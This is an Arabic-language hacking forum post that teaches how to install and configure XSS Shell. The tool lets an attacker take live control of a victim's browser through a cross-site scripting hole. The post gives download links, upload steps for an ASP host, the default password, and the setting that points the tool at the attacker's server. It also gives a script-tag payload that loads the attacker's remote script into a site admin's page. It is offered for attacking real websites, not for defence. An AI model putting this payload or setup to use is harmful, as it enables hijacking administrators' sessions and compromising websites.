السلام عليكم ورحمه الله وبركاته

اليوم رح نبدا حركه حلوه ورائعه دعم ثغرات xss بسكربت للتحكم اون لاين بالهدف ...!!!

الفكره بالدرس
انك تلقى ثغره xss وتهاجم بمستوى اعلى من مجرد تحصل ع الكوكز الخاص بالادمن
ويكون هذا التحكم بعيد كل البعد عن الاكواد المعقده وهاد يكون بكل بساطه من خلال سكربت
xss shell


http://labs.portcullis.co.uk/images/...fbvdixxtlx.gif


طريقه التنصيب
أول شيء تحميل الفايلات من هون
http://labs.portcullis.co.uk/downloa...xsstunnell.zip

بعدين ارفع الفولدر ع ايا استضافه تدعم لغه asp لانه شغلك رح يكون ع شركه asp
(ينفع استخدام السيرفر الشخصي اذا كان مركب عليه ip ثابت ) << ام التعقيد :P

Install Admin Interface

بعد نفك الضغط نرفع هاد ع فولدر بموقعك
xssshell
وهذا الفولدر
db
رابط السكربت يصير كالتالي
http://[vbspiders]/xssshell/
بطلب باسورد والباس الافتراضي هو
w00t

طيب هيك السكربت خلصنا تنصيبه بس لسا ضايل لنا خطوه ثانيه

Configure XSS Shell for communication

نفتح هذا الفايل
xssshell.asp
ندور ع كلمه
SERVER
نغير الي قدامها لرابط السكربت
يعني المكان الي رفعت عليه الفايلات هاي والخرابيط
"http://[YOURHOST]/xssshell/";
مثلا انا رفعته ع vbspiders
بصير هيك
"http://[vbspiders]/xssshell/";

وهيك انت تمام التمام
بكون جهزت الهجوم وكل اشي :showoff:

طيب نستغل ثغره
xss
بزي كود التحويل او ايا كود بحيث انك تسحب المسكين ادمن الموقع للصفحه
وهذا احد الاكواد
< s c r i p t src="http://[vbspiders]/xssshell.asp"> < / s c r i p t >
مع ازاله المسافات بين كلمه سكربت


مش رح اشرح كل اشي زي الصغار المفروض مستوانا اعلى من هيك بس عشان التنصيب شويه فيه غلبه
شرحته
والباقي من خيارات السكربت اكتشفوها وهي بسيطه كثير


يديو تتوريال (ديمو )
http://www.securitytube.net/video/1098



المصدر
http://labs.portcullis.co.uk/application/xssshell/

مع خالص دعواتكم لي بالتوفيق بدراستي

شكر خاص لاخوكم ALQAYSAR